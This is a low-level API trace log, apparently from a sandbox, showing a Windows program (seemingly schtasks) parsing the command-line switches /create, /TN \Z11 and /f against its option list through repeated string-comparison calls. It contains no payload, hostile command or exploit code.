[0220.572] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.572] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.572] lstrlenW (lpString="|?|") returned 3
[0220.572] lstrlenW (lpString="|TN|") returned 4
[0220.572] SetLastError (dwErrCode=0x490)
[0220.572] lstrlenW (lpString="s") returned 1
[0220.572] lstrlenW (lpString="s") returned 1
[0220.572] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.572] lstrlenW (lpString="TN") returned 2
[0220.572] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
[0220.573] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.573] lstrlenW (lpString="|s|") returned 3
[0220.573] lstrlenW (lpString="|TN|") returned 4
[0220.573] SetLastError (dwErrCode=0x490)
[0220.573] lstrlenW (lpString="u") returned 1
[0220.573] lstrlenW (lpString="u") returned 1
[0220.573] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] lstrlenW (lpString="TN") returned 2
[0220.573] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.573] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.573] lstrlenW (lpString="|u|") returned 3
[0220.573] lstrlenW (lpString="|TN|") returned 4
[0220.573] SetLastError (dwErrCode=0x490)
[0220.574] lstrlenW (lpString="p") returned 1
[0220.574] lstrlenW (lpString="p") returned 1
[0220.574] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.574] lstrlenW (lpString="TN") returned 2
[0220.574] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.574] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.574] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.574] lstrlenW (lpString="|p|") returned 3
[0220.574] lstrlenW (lpString="|TN|") returned 4
[0220.574] SetLastError (dwErrCode=0x490)
[0220.574] lstrlenW (lpString="ru") returned 2
[0220.574] lstrlenW (lpString="ru") returned 2
[0220.574] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.575] lstrlenW (lpString="TN") returned 2
[0220.575] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.575] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.575] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.575] lstrlenW (lpString="|ru|") returned 4
[0220.575] lstrlenW (lpString="|TN|") returned 4
[0220.575] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0220.575] SetLastError (dwErrCode=0x490)
[0220.575] lstrlenW (lpString="rp") returned 2
[0220.575] lstrlenW (lpString="rp") returned 2
[0220.575] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] lstrlenW (lpString="TN") returned 2
[0220.576] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.576] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.576] lstrlenW (lpString="|rp|") returned 4
[0220.576] lstrlenW (lpString="|TN|") returned 4
[0220.576] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0220.576] SetLastError (dwErrCode=0x490)
[0220.576] lstrlenW (lpString="sc") returned 2
[0220.576] lstrlenW (lpString="sc") returned 2
[0220.576] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] lstrlenW (lpString="TN") returned 2
[0220.576] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.577] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.577] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.577] lstrlenW (lpString="|sc|") returned 4
[0220.577] lstrlenW (lpString="|TN|") returned 4
[0220.577] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0220.577] SetLastError (dwErrCode=0x490)
[0220.577] lstrlenW (lpString="mo") returned 2
[0220.577] lstrlenW (lpString="mo") returned 2
[0220.577] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.577] lstrlenW (lpString="TN") returned 2
[0220.577] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.578] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.578] lstrlenW (lpString="|mo|") returned 4
[0220.578] lstrlenW (lpString="|TN|") returned 4
[0220.578] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0220.578] SetLastError (dwErrCode=0x490)
[0220.578] lstrlenW (lpString="d") returned 1
[0220.578] lstrlenW (lpString="d") returned 1
[0220.578] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] lstrlenW (lpString="TN") returned 2
[0220.578] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.579] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.579] lstrlenW (lpString="|d|") returned 3
[0220.579] lstrlenW (lpString="|TN|") returned 4
[0220.579] SetLastError (dwErrCode=0x490)
[0220.579] lstrlenW (lpString="m") returned 1
[0220.579] lstrlenW (lpString="m") returned 1
[0220.579] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.579] lstrlenW (lpString="TN") returned 2
[0220.579] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.579] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.579] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.579] lstrlenW (lpString="|m|") returned 3
[0220.579] lstrlenW (lpString="|TN|") returned 4
[0220.580] SetLastError (dwErrCode=0x490)
[0220.580] lstrlenW (lpString="i") returned 1
[0220.580] lstrlenW (lpString="i") returned 1
[0220.580] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.580] lstrlenW (lpString="TN") returned 2
[0220.580] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.580] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.580] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.580] lstrlenW (lpString="|i|") returned 3
[0220.580] lstrlenW (lpString="|TN|") returned 4
[0220.580] SetLastError (dwErrCode=0x490)
[0220.580] lstrlenW (lpString="tn") returned 2
[0220.581] lstrlenW (lpString="tn") returned 2
[0220.581] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.581] lstrlenW (lpString="TN") returned 2
[0220.581] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.581] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.581] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.581] lstrlenW (lpString="|tn|") returned 4
[0220.581] lstrlenW (lpString="|TN|") returned 4
[0220.581] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0220.581] SetLastError (dwErrCode=0x0)
[0220.581] SetLastError (dwErrCode=0x0)
[0220.581] lstrlenW (lpString="\\Z11") returned 4
[0220.582] lstrlenW (lpString="-/") returned 2
[0220.582] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="\\Z11") returned 4
[0220.582] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="\\Z11") returned 4
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="/f") returned 2
[0220.582] lstrlenW (lpString="-/") returned 2
[0220.583] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.583] lstrlenW (lpString="create") returned 6
[0220.583] lstrlenW (lpString="create") returned 6
[0220.583] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.583] lstrlenW (lpString="f") returned 1
[0220.583] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.583] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.583] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.583] lstrlenW (lpString="|create|") returned 8
[0220.583] lstrlenW (lpString="|f|") returned 3
[0220.584] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0220.584] SetLastError (dwErrCode=0x490)
[0220.584] lstrlenW (lpString="?") returned 1
[0220.584] lstrlenW (lpString="?") returned 1
[0220.584] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.584] lstrlenW (lpString="f") returned 1
[0220.584] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.584] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.584] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.584] lstrlenW (lpString="|?|") returned 3
[0220.584] lstrlenW (lpString="|f|") returned 3
[0220.584] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0220.585] SetLastError (dwErrCode=0x490)
[0220.585] lstrlenW (lpString="s") returned 1
[0220.585] lstrlenW (lpString="s") returned 1
[0220.585] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.585] lstrlenW (lpString="f") returned 1
[0220.585] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.585] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
[0220.585] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.585] lstrlenW (lpString="|s|") returned 3
[0220.585] lstrlenW (lpString="|f|") returned 3
[0220.585] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0220.585] SetLastError (dwErrCode=0x490)
[0220.585] lstrlenW (lpString="u") returned 1
[0220.586] lstrlenW (lpString="u") returned 1
[0220.586] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.586] lstrlenW (lpString="f") returned 1
[0220.586] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.586] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.586] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.586] lstrlenW (lpString="|u|") returned 3
[0220.586] lstrlenW (lpString="|f|") returned 3
[0220.586] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0220.586] SetLastError (dwErrCode=0x490)
[0220.586] lstrlenW (lpString="p") returned 1
[0220.586] lstrlenW (lpString="p") returned 1
[0220.587] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.587] lstrlenW (lpString="f") returned 1
[0220.587] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.587] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.587] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.587] lstrlenW (lpString="|p|") returned 3
[0220.587] lstrlenW (lpString="|f|") returned 3
[0220.587] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0220.587] SetLastError (dwErrCode=0x490)
[0220.587] lstrlenW (lpString="ru") returned 2
[0220.587] lstrlenW (lpString="ru") returned 2
[0220.587] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.588] lstrlenW (lpString="f") returned 1
[0220.588] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.588] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.588] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.588] lstrlenW (lpString="|ru|") returned 4
[0220.588] lstrlenW (lpString="|f|") returned 3
[0220.588] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0220.588] SetLastError (dwErrCode=0x490)
[0220.588] lstrlenW (lpString="rp") returned 2
[0220.588] lstrlenW (lpString="rp") returned 2
[0220.588] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.589] lstrlenW (lpString="f") returned 1
[0220.589] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.589] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.589] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.589] lstrlenW (lpString="|rp|") returned 4
[0220.589] lstrlenW (lpString="|f|") returned 3
[0220.589] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0220.589] SetLastError (dwErrCode=0x490)
[0220.590] lstrlenW (lpString="sc") returned 2
[0220.590] lstrlenW (lpString="sc") returned 2
[0220.590] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.590] lstrlenW (lpString="f") returned 1
[0220.590] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.590] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.590] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.590] lstrlenW (lpString="|sc|") returned 4
[0220.590] lstrlenW (lpString="|f|") returned 3
[0220.590] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0220.590] SetLastError (dwErrCode=0x490)
[0220.591] lstrlenW (lpString="mo") returned 2
[0220.591] lstrlenW (lpString="mo") returned 2
[0220.591] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.591] lstrlenW (lpString="f") returned 1
[0220.591] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.591] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.591] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.591] lstrlenW (lpString="|mo|") returned 4
[0220.591] lstrlenW (lpString="|f|") returned 3
[0220.591] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0220.591] SetLastError (dwErrCode=0x490)
[0220.591] lstrlenW (lpString="d") returned 1
[0220.592] lstrlenW (lpString="d") returned 1
[0220.592] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.592] lstrlenW (lpString="f") returned 1
[0220.592] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.592] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.592] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.592] lstrlenW (lpString="|d|") returned 3
[0220.592] lstrlenW (lpString="|f|") returned 3
[0220.592] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0220.592] SetLastError (dwErrCode=0x490)
[0220.592] lstrlenW (lpString="m") returned 1
[0220.592] lstrlenW (lpString="m") returned 1
[0220.593] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.593] lstrlenW (lpString="f") returned 1
[0220.593] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.593] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.593] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.593] lstrlenW (lpString="|m|") returned 3
[0220.593] lstrlenW (lpString="|f|") returned 3
[0220.593] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0220.593] SetLastError (dwErrCode=0x490)
[0220.593] lstrlenW (lpString="i") returned 1
[0220.593] lstrlenW (lpString="i") returned 1
[0220.593] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] lstrlenW (lpString="f") returned 1
[0220.594] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.594] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.594] lstrlenW (lpString="|i|") returned 3
[0220.594] lstrlenW (lpString="|f|") returned 3
[0220.594] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0220.594] SetLastError (dwErrCode=0x490)
[0220.594] lstrlenW (lpString="tn") returned 2
[0220.594] lstrlenW (lpString="tn") returned 2
[0220.594] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] lstrlenW (lpString="f") returned 1
[0220.595] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.595] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.595] lstrlenW (lpString="|tn|") returned 4
[0220.595] lstrlenW (lpString="|f|") returned 3
[0220.595] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0220.595] SetLastError (dwErrCode=0x490)
[0220.595] lstrlenW (lpString="tr") returned 2
[0220.595] lstrlenW (lpString="tr") returned 2
[0220.595] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] lstrlenW (lpString="f") returned 1
[0220.595] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tr|") returned 4
[0220.596] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.596] lstrlenW (lpString="|tr|") returned 4
[0220.596] lstrlenW (lpString="|f|") returned 3
[0220.596] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0220.596] SetLastError (dwErrCode=0x490)
[0220.596] lstrlenW (lpString="st") returned 2
[0220.596] lstrlenW (lpString="st") returned 2
[0220.596] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.596] lstrlenW (lpString="f") returned 1
[0220.596] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.596] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|st|") returned 4
[0220.596] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.596] lstrlenW (lpString="|st|") returned 4
[0220.596] lstrlenW (lpString="|f|") returned 3
[0220.597] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0220.597] SetLastError (dwErrCode=0x490)
[0220.597] lstrlenW (lpString="sd") returned 2
[0220.597] lstrlenW (lpString="sd") returned 2
[0220.597] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.597] lstrlenW (lpString="f") returned 1
[0220.597] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.597] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sd|") returned 4
[0220.597] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.597] lstrlenW (lpString="|sd|") returned 4
[0220.597] lstrlenW (lpString="|f|") returned 3
[0220.597] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0220.597] SetLastError (dwErrCode=0x490)
[0220.597] lstrlenW (lpString="ed") returned 2
[0220.598] lstrlenW (lpString="ed") returned 2
[0220.598] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] lstrlenW (lpString="f") returned 1
[0220.598] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ed|") returned 4
[0220.598] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.598] lstrlenW (lpString="|ed|") returned 4
[0220.598] lstrlenW (lpString="|f|") returned 3
[0220.598] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0220.598] SetLastError (dwErrCode=0x490)
[0220.598] lstrlenW (lpString="it") returned 2
[0220.598] lstrlenW (lpString="it") returned 2
[0220.598] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] lstrlenW (lpString="f") returned 1
[0220.599] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|it|") returned 4
[0220.599] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.599] lstrlenW (lpString="|it|") returned 4
[0220.599] lstrlenW (lpString="|f|") returned 3
[0220.599] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0220.599] SetLastError (dwErrCode=0x490)
[0220.599] lstrlenW (lpString="et") returned 2
[0220.599] lstrlenW (lpString="et") returned 2
[0220.599] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] lstrlenW (lpString="f") returned 1
[0220.599] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|et|") returned 4
[0220.599] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.600] lstrlenW (lpString="|et|") returned 4
[0220.600] lstrlenW (lpString="|f|") returned 3
[0220.600] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0220.600] SetLastError (dwErrCode=0x490)
[0220.600] lstrlenW (lpString="k") returned 1
[0220.600] lstrlenW (lpString="k") returned 1
[0220.600] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.600] lstrlenW (lpString="f") returned 1
[0220.600] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.600] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|k|") returned 3
[0220.600] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.600] lstrlenW (lpString="|k|") returned 3
[0220.600] lstrlenW (lpString="|f|") returned 3
[0220.600] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0220.601] SetLastError (dwErrCode=0x490)
[0220.601] lstrlenW (lpString="du") returned 2
[0220.601] lstrlenW (lpString="du") returned 2
[0220.601] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.601] lstrlenW (lpString="f") returned 1
[0220.601] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.601] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|du|") returned 4
[0220.601] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
